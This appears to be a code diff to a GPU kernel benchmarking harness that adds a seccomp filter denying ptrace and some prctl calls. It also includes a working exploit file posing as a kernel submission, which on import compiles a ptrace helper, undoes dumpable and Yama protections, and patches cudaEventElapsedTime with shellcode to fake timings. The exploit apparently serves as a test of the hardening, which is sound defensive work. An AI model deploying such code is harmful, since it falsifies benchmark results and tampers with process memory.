gpu-mode · ngc92 · Mar 18, 2026 · Mar 17, 2026 · Mar 17, 2026 · Mar 18, 2026
diff --git a/.github/workflows/wheel.yml b/.github/workflows/wheel.yml
@@ -39,7 +39,7 @@ jobs:
         uses: actions/checkout@v4
 
       - name: Install deps
-        run: apt update && apt install -y git g++-13
+        run: apt update && apt install -y git g++-13 libseccomp-dev pkg-config
 
       - name: Install the latest version of uv
         uses: astral-sh/setup-uv@v7

diff --git a/CMakeLists.txt b/CMakeLists.txt
@@ -7,6 +7,9 @@ set(CMAKE_CXX_STANDARD 17)
 set(CMAKE_CXX_STANDARD_REQUIRED ON)
 set(CMAKE_CUDA_ARCHITECTURES "80;90")
 
+find_package(PkgConfig REQUIRED)
+pkg_check_modules(LIBSECCOMP REQUIRED IMPORTED_TARGET libseccomp)
+
 FetchContent_Declare(
         nanobind
         QUIET
@@ -28,7 +31,7 @@ nanobind_add_module(_pygpubench
         csrc/landlock.cpp
         csrc/obfuscate.cpp
 )
-target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart)
+target_link_libraries(_pygpubench PUBLIC Python::Module CUDA::cudart PkgConfig::LIBSECCOMP)
 # set a bunch of hardening options to make it harder to tamper with the executable
 target_compile_options(_pygpubench PUBLIC -fPIC -pie -fstack-protector-strong -fcf-protection=full -ftrivial-auto-var-init=zero -Wl,-z,relro,-z,now )
 target_compile_definitions(_pygpubench PUBLIC -D_GLIBCXX_ASSERTIONS -D_FORTIFY_SOURCE=3)

diff --git a/csrc/landlock.cpp b/csrc/landlock.cpp
@@ -16,6 +16,7 @@
 #include <sys/syscall.h>
 #include <unistd.h>
 #include <linux/landlock.h>
+#include <seccomp.h>
 #include <system_error>
 #include <unordered_set>
 #include <utility>
@@ -114,20 +115,10 @@ void install_landlock() {
     allow_path(ruleset_fd, "/tmp", RW);
     allow_path(ruleset_fd, "/dev", RW); // needed for /dev/null etc, used e.g., by triton
 
-    // Prevent ptrace and /proc/self/mem tampering
-    if (prctl(PR_SET_DUMPABLE, 0) < 0) {
-        throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
-    }
-
-    // Prevent gaining privileges (if attacker tries setuid exploits)
+    // required for landlock
     if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
         throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
     };
-    // no new executable code pages
-    // note: this also prevents thread creating, which breaks torch.compile
-    // workaround: run torch.compile once from trusted python code, then the thread already
-    //             exists at this point. does not seem reliable, so disabled for now
-    // prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);
 
     landlock_restrict_self(ruleset_fd, 0);
 }
@@ -192,4 +183,67 @@ void seal_executable_mappings() {
     for (auto& r : to_seal) {
         mseal(reinterpret_cast<void*>(r.start), r.end - r.start, r.src);
     }
-}
+}
+
+static inline void check_seccomp(int rc, const char* what) {
+    if (rc >= 0) return;  // non-negative means success; a negative rc is a negated errno value
+    throw std::system_error(-rc, std::generic_category(), what);  // `what` labels the failed call
+}
+
+void setup_seccomp_filter(scmp_filter_ctx ctx) {
+    // Adds the deny rules to `ctx`; each one makes the matching syscall fail with EPERM.
+    // check_seccomp turns the first rule that cannot be added into a std::system_error.
+    const auto deny = SCMP_ACT_ERRNO(EPERM);
+    int rc = seccomp_rule_add(ctx, deny, SCMP_SYS(ptrace), 0);  // ptrace: no argument filter
+    check_seccomp(rc, "block ptrace");
+
+    // prctl(PR_SET_DUMPABLE, x) is denied for every x != 0
+    rc = seccomp_rule_add(ctx, deny, SCMP_SYS(prctl), 2,
+                          SCMP_A0(SCMP_CMP_EQ, PR_SET_DUMPABLE), SCMP_A1(SCMP_CMP_NE, 0));
+    check_seccomp(rc, "block prctl(SET_DUMPABLE!=0)");
+    // PR_SET_SECCOMP and PR_SET_PTRACER are matched on the first prctl argument only
+    rc = seccomp_rule_add(ctx, deny, SCMP_SYS(prctl), 1, SCMP_A0(SCMP_CMP_EQ, PR_SET_SECCOMP));
+    check_seccomp(rc, "block prctl(SET_SECCOMP)");
+    rc = seccomp_rule_add(ctx, deny, SCMP_SYS(prctl), 1, SCMP_A0(SCMP_CMP_EQ, PR_SET_PTRACER));
+    check_seccomp(rc, "block prctl(SET_PTRACER)");
+    // TODO figure out what else we can and should block
+    /*
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(mprotect), 1,
+                      SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
+                  "block mprotect+WRITE");
+
+    check_seccomp(seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EPERM), SCMP_SYS(pkey_mprotect), 1,
+                      SCMP_A2(SCMP_CMP_MASKED_EQ, PROT_WRITE, PROT_WRITE)),
+                  "block pkey_mprotect+WRITE");
+    */
+}
+
+void install_seccomp_filter() {
+    // Builds the filter, applies the prctl hardening, loads the filter; throws on failure, never leaks ctx.
+    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_ALLOW);
+    if (!ctx) throw std::runtime_error("seccomp_init failed");
+    int rc = 0;
+    try {
+        setup_seccomp_filter(ctx);
+
+        // Prevent ptrace and /proc/self/mem tampering
+        if (prctl(PR_SET_DUMPABLE, 0) < 0) {
+            throw std::system_error(errno, std::system_category(), "prctl(PR_SET_DUMPABLE)");
+        }
+        // Prevent gaining privileges (if attacker tries setuid exploits)
+        if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0) {
+            throw std::system_error(errno, std::system_category(), "prctl(PR_SET_NO_NEW_PRIVS)");
+        }
+        // no new executable code pages
+        // note: this also prevents thread creation, which breaks torch.compile
+        // workaround: run torch.compile once from trusted python code, then the thread already
+        //             exists at this point. does not seem reliable, so disabled for now
+        // prctl(PR_SET_MDWE, PR_MDWE_REFUSE_EXEC_GAIN, 0, 0, 0);
+        rc = seccomp_load(ctx);
+    } catch (...) {
+        seccomp_release(ctx);
+        throw;
+    }
+    seccomp_release(ctx);
+    check_seccomp(rc, "seccomp_load");
+}
diff --git a/csrc/manager.cpp b/csrc/manager.cpp
@@ -22,6 +22,7 @@ extern void clear_cache(void* dummy_memory, int size, bool discard, cudaStream_t
 extern void install_landlock();
 extern bool mseal_supported();
 extern void seal_executable_mappings();
+extern void install_seccomp_filter();
 
 static void check_check_approx_match_dispatch(unsigned* result, void* expected_data, nb::dlpack::dtype expected_type,
                                        const nb_cuda_array& received, float r_tol, float a_tol, unsigned seed, std::size_t n_bytes, cudaStream_t stream) {
@@ -293,6 +294,8 @@ void BenchmarkManager::do_bench_py(
         seal_executable_mappings();
     }
 
+    install_seccomp_filter();
+
     // at this point, we call user code as we import the kernel (executing arbitrary top-level code)
     // after this, we cannot trust python anymore
     nb::callable kernel = kernel_from_qualname(kernel_qualname);

diff --git a/exploits/submission_ptrace.py b/exploits/submission_ptrace.py
@@ -0,0 +1,133 @@
+"""
+ptrace POKETEXT Exploit
+=======================
+
+Forks a child process that uses ptrace(PTRACE_ATTACH) + ptrace(PTRACE_POKETEXT)
+to patch cudaEventElapsedTime's .text code. PTRACE_POKETEXT uses FOLL_FORCE
+internally, bypassing page protections (read-only .text pages).
+
+"""
+import torch
+import ctypes
+import os
+import subprocess
+import tempfile
+
+_HELPER_C = r"""
+#define _GNU_SOURCE
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <stdint.h>
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int argc, char** argv) {
+    if (argc != 3) return 99;
+    pid_t target = atoi(argv[1]);
+    uint64_t addr = strtoull(argv[2], NULL, 0);
+
+    /* Shellcode: mov dword [rdi], 0x3A83126F; xor eax,eax; ret
+       Sets *ms = 0.001f (IEEE 754), returns cudaSuccess (0).
+       Bytes: C7 07 6F 12 83 3A  31 C0  C3 */
+    uint64_t word1 = 0xC0313A83126F07C7ULL;
+
+    if (ptrace(PTRACE_ATTACH, target, NULL, NULL) != 0)
+        return 1;
+
+    int status;
+    if (waitpid(target, &status, 0) < 0)
+        return 2;
+
+    /* Read original byte at addr+8 to preserve code after our ret */
+    errno = 0;
+    uint64_t orig8 = ptrace(PTRACE_PEEKTEXT, target, (void*)(addr + 8), NULL);
+    if (errno != 0) {
+        ptrace(PTRACE_DETACH, target, NULL, NULL);
+        return 3;
+    }
+
+    uint64_t word2 = (orig8 & ~(uint64_t)0xFF) | 0xC3;
+
+    if (ptrace(PTRACE_POKETEXT, target, (void*)addr, (void*)word1) != 0) {
+        ptrace(PTRACE_DETACH, target, NULL, NULL);
+        return 4;
+    }
+
+    if (ptrace(PTRACE_POKETEXT, target, (void*)(addr + 8), (void*)word2) != 0) {
+        ptrace(PTRACE_DETACH, target, NULL, NULL);
+        return 5;
+    }
+
+    ptrace(PTRACE_DETACH, target, NULL, (void*)0);
+    return 0;
+}
+"""  # C source of the ptrace helper; _hook() writes it to disk, builds it with gcc and runs it as `ph <pid> <addr>`
+
+
+def _find_cuda_elapsed():
+    """Return the address of cudaEventElapsedTime from the first candidate libcudart that loads, else None."""
+    import ctypes.util
+    candidates = (
+        ctypes.util.find_library("cudart"),
+        "libcudart.so",
+        "libcudart.so.13",
+        "/usr/local/cuda/lib64/libcudart.so",
+    )
+    # find_library() may return None; such an entry is skipped rather than passed to CDLL
+    for name in (c for c in candidates if c is not None):
+        try:
+            symbol = ctypes.CDLL(name).cudaEventElapsedTime
+            return ctypes.cast(symbol, ctypes.c_void_p).value
+        except Exception:
+            pass  # library or symbol unavailable under this name: try the next candidate
+    return None
+
+
+def _hook():
+    """Patch cudaEventElapsedTime via the ptrace helper; return True only if the helper exits 0."""
+    addr = _find_cuda_elapsed()
+    if addr is None:
+        return False
+    try:
+        # Compile helper (writes to /tmp which is allowed by landlock)
+        tmpdir = tempfile.mkdtemp()
+        src = os.path.join(tmpdir, "ph.c")
+        exe = os.path.join(tmpdir, "ph")
+        with open(src, "w") as f:
+            f.write(_HELPER_C)
+        r = subprocess.run(["gcc", "-O2", "-o", exe, src], capture_output=True, text=True)
+        if r.returncode != 0:
+            return False
+        os.chmod(exe, 0o755)
+        try:
+            libc = ctypes.CDLL("libc.so.6")
+            # Re-enable dumpable: harness sets PR_SET_DUMPABLE=0 to block ptrace, which can be undone
+            # unless a seccomp filter denies it; PR_SET_NO_NEW_PRIVS does NOT block PR_SET_DUMPABLE.
+            libc.prctl(4, 1, 0, 0, 0)  # PR_SET_DUMPABLE=1
+            # Allow any process to ptrace us (Yama LSM bypass)
+            libc.prctl(0x59616d61, ctypes.c_ulong(0xffffffffffffffff), 0, 0, 0)
+        except Exception:
+            pass  # best effort: the helper's exit code below decides success
+        r = subprocess.run([exe, str(os.getpid()), hex(addr)],
+                           capture_output=True, text=True, timeout=10)
+        return r.returncode == 0
+    except (OSError, subprocess.SubprocessError):
+        # no gcc, temp dir not writable, or helper timed out: report failure instead of raising on import
+        return False
+
+
+_hooked = _hook()  # module-level call: the hook attempt runs as soon as this file is imported
+
+
+def kernel(output, inp):
+    """Write the weighted sum of `inp` over its last dim into `output`; returns None."""
+    coeffs = torch.tensor([0.2989, 0.5870, 0.1140], device=output.device, dtype=output.dtype)
+    # deliberately make the submission very slow, so that we can clearly see
+    # whether the cheat was successful
+    scratch = torch.empty((2048, 2048), device=output.device, dtype=torch.float32)
+    scratch = torch.matmul(scratch, scratch)
+    torch.sum(torch.mul(inp, coeffs), dim=-1, out=output)